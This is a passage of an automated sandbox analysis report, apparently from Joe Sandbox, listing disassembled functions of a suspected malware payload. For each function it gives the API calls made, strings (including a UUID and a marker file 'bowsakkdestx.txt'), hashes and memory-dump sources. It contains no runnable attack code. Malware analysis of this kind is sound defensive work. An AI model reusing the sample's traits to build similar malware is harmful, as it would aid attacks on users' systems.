                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: e674bae559b4caacadf5bcee9c39ec70defedf0645bd18497b2609138d7fc999
                                                                                                        • Instruction ID: 20d4a139b1a498d84ca1bf7418397b5cd6f8bd7bec90050687a03bfab30a5ace
                                                                                                        • Opcode Fuzzy Hash: e674bae559b4caacadf5bcee9c39ec70defedf0645bd18497b2609138d7fc999
                                                                                                        • Instruction Fuzzy Hash: 2C51D9727083249FDB24EE2CEC80A6A77A6EF84710B24891DF855CB345DB31DC54EB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F24160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 7b84685e9b58b2dad582afcda03abb71046594b8d19581c5d95c04f4f53941c0
                                                                                                        • Instruction ID: 80886920f2c0d735aeecfdd8dc9532419afbca31b0f023ae1cab7c165829d81c
                                                                                                        • Opcode Fuzzy Hash: 7b84685e9b58b2dad582afcda03abb71046594b8d19581c5d95c04f4f53941c0
                                                                                                        • Instruction Fuzzy Hash: 20310831700224DBDB28DE4DEC8192A77A6EF807107204A1CF865CB2C5D7B1FD40ABA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F6AE30 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: .\crypto\buffer\buffer.c
                                                                                                        • API String ID: 2102423945-294840303
                                                                                                        • Opcode ID: 65d7fba60d131b7be1b51a8c1a8cb50101ab85b68233e85854a341431fc063a9
                                                                                                        • Instruction ID: fd9cb28329cfa78af43791671519ecd601f3c95e8de6540e42f46b7e5fa17189
                                                                                                        • Opcode Fuzzy Hash: 65d7fba60d131b7be1b51a8c1a8cb50101ab85b68233e85854a341431fc063a9
                                                                                                        • Instruction Fuzzy Hash: AF2137B6B403213FE210AA5DFC52B26B399EB94B24F004125F318EB2C2E6B1F810D7D5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • UuidCreate.RPCRT4(?), ref: 00F1C5DA
                                                                                                        • UuidToStringA.RPCRT4(?,00000000), ref: 00F1C5F6
                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 00F1C640
                                                                                                        Strings
                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00F1C687
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                        • Opcode ID: 248cd732d075d675a6a29f84706e19826f522195e06a21996770e092b55b3044
                                                                                                        • Instruction ID: 3692359b37ad628ba5c2ed4c19f019c70fe27ca536c69e637e9cfa9dee7ab9bb
                                                                                                        • Opcode Fuzzy Hash: 248cd732d075d675a6a29f84706e19826f522195e06a21996770e092b55b3044
                                                                                                        • Instruction Fuzzy Hash: 9E213B72208341ABD720DF28DC04BABBBE9EF81754F004A2EF48987291D775D544E7D2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C48B
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1C4A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 29327785-2616962270
                                                                                                        • Opcode ID: f1d85e974ab29a4cbc04f756fa82de7abe19e124d1eccbc662293cda5614e03a
                                                                                                        • Instruction ID: 88649ff8781f4c58ce3ea22232c4fec9fd691870b9759665ce7d6bdb87310217
                                                                                                        • Opcode Fuzzy Hash: f1d85e974ab29a4cbc04f756fa82de7abe19e124d1eccbc662293cda5614e03a
                                                                                                        • Instruction Fuzzy Hash: 43014972A8022C33DE30B6A4AC47FFFB35C8B51731F000197FE08D6180E6A58986B6D1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F2BA4A
                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00F2BA73
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                        • String ID: 0$LPCWSTRszWindowClass
                                                                                                        • API String ID: 1693014935-1496217519
                                                                                                        • Opcode ID: 02904a343081b95e8ffcc9e41433c46ceb8cde470cc4e6a041191ad17667ec98
                                                                                                        • Instruction ID: 6c60ca5677076bf3815c526cc9e2e498db1c9879f4d7b8363cbe2b704573a627
                                                                                                        • Opcode Fuzzy Hash: 02904a343081b95e8ffcc9e41433c46ceb8cde470cc4e6a041191ad17667ec98
                                                                                                        • Instruction Fuzzy Hash: 8FF062B0C0531D9BEB00DFD5D9597DEBBB4BB08709F104259D9147A280D7BA1608CFD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C438
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1C44E
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1C45B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 610490371-2616962270
                                                                                                        • Opcode ID: 03014b01f0396e33a75fa495966a2c21aaf4fa8026e69ceab6797072e2e3cb7e
                                                                                                        • Instruction ID: 0922b072f7bd7781445a5081a131b6321a65a6d68e2f3b61e790d0e3b3de6491
                                                                                                        • Opcode Fuzzy Hash: 03014b01f0396e33a75fa495966a2c21aaf4fa8026e69ceab6797072e2e3cb7e
                                                                                                        • Instruction Fuzzy Hash: A0E0867568431E67EB20EBB0DC8AFD9776C9B04B01F000093BB48D60C0D6B0A584DAD1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1ECB0 Relevance: 6.2, APIs: 4, Instructions: 204COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove_strtok
                                                                                                        • String ID:
                                                                                                        • API String ID: 3446180046-0
                                                                                                        • Opcode ID: b9f72f1d52a587435e49d668fb60e2057325d9f5f6c983d7b4a9acb1398822be
                                                                                                        • Instruction ID: b0f79aa3d1308da9fc350e7dc9b8b72b98a34c2bc32db489243af673e7059d1f
                                                                                                        • Opcode Fuzzy Hash: b9f72f1d52a587435e49d668fb60e2057325d9f5f6c983d7b4a9acb1398822be
                                                                                                        • Instruction Fuzzy Hash: 9881ACB1A00206DFEB14DF58D9807EEBBF1FF14314F14492DE80697281D7BAAA94DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F4C677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F4C6AD
                                                                                                        • __isleadbyte_l.LIBCMT ref: 00F4C6DB
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,00F4C0ED,?,00BFBBEF,00000003), ref: 00F4C709
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,00F4C0ED,?,00BFBBEF,00000003), ref: 00F4C73F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3058430110-0
                                                                                                        • Opcode ID: 67e2f5b9c0987b4ac24b7ca93c3dabecba67b478c8b249c8e2697c4cba9415a5
                                                                                                        • Instruction ID: 6fb8c094938371a36a6c0509715a6cbe44a7c27f6c515fcd31aa33f2423a73c3
                                                                                                        • Opcode Fuzzy Hash: 67e2f5b9c0987b4ac24b7ca93c3dabecba67b478c8b249c8e2697c4cba9415a5
                                                                                                        • Instruction Fuzzy Hash: 9731CF31A02206EFDB618F75CC44BAA7FA9FF41320F15A429E854871A0E731E850EBD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00FD7094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00FD70AB
                                                                                                          • Part of subcall function 00FD77A0: ___BuildCatchObjectHelper.LIBCMT ref: 00FD77D2
                                                                                                          • Part of subcall function 00FD77A0: ___AdjustPointer.LIBCMT ref: 00FD77E9
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00FD70C2
                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00FD70D4
                                                                                                        • CallCatchBlock.LIBCMT ref: 00FD70F8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                        • String ID:
                                                                                                        • API String ID: 2901542994-0
                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                        • Instruction ID: 361b905be228522e809e84bd1e76a55e94c990872c0401f098e44e9a85337dc3
                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                        • Instruction Fuzzy Hash: 87012932400208BBCF126F55CC05EDA3BBBFF88714F184016FD1866221E336E961EBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F353B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00F35007: __getptd_noexit.LIBCMT ref: 00F35008
                                                                                                          • Part of subcall function 00F35007: __amsg_exit.LIBCMT ref: 00F35015
                                                                                                        • __calloc_crt.LIBCMT ref: 00F35A01
                                                                                                          • Part of subcall function 00F38C96: __calloc_impl.LIBCMT ref: 00F38CA5
                                                                                                        • __lock.LIBCMT ref: 00F35A37
                                                                                                        • ___addlocaleref.LIBCMT ref: 00F35A43
                                                                                                        • __lock.LIBCMT ref: 00F35A57
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                        • String ID:
                                                                                                        • API String ID: 2580527540-0
                                                                                                        • Opcode ID: da160c8f9bcf42c87b99b11bda93050bf1f598e0632c307344c94525d48449a1
                                                                                                        • Instruction ID: 8662862152116c1f7f151848b22322afb224ff91b49657e01cd8ee4b7d1ed806
                                                                                                        • Opcode Fuzzy Hash: da160c8f9bcf42c87b99b11bda93050bf1f598e0632c307344c94525d48449a1
                                                                                                        • Instruction Fuzzy Hash: 10015272941740DFDB20FFA88C42B1D7BE09F81B70F204249F4659B2C6CE7C5941BA65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F509B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                        • String ID:
                                                                                                        • API String ID: 3016257755-0
                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                        • Instruction ID: 17738081dfb00625a74465165169b7e4db817906d36e5fe9c4220b9237076c56
                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                        • Instruction Fuzzy Hash: 1601403640014EBFCF125E84CC528EE3F66BB29356F588455FF1958135CA3AC9B6BB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F227A0 Relevance: 6.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32 ref: 00F227B9
                                                                                                        • _malloc.LIBCMT ref: 00F227C3
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: RtlAllocateHeap.NTDLL(00840000,00000000,00000001,00000001,?,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30CA5
                                                                                                        • _memset.LIBCMT ref: 00F227CE
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00F227E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
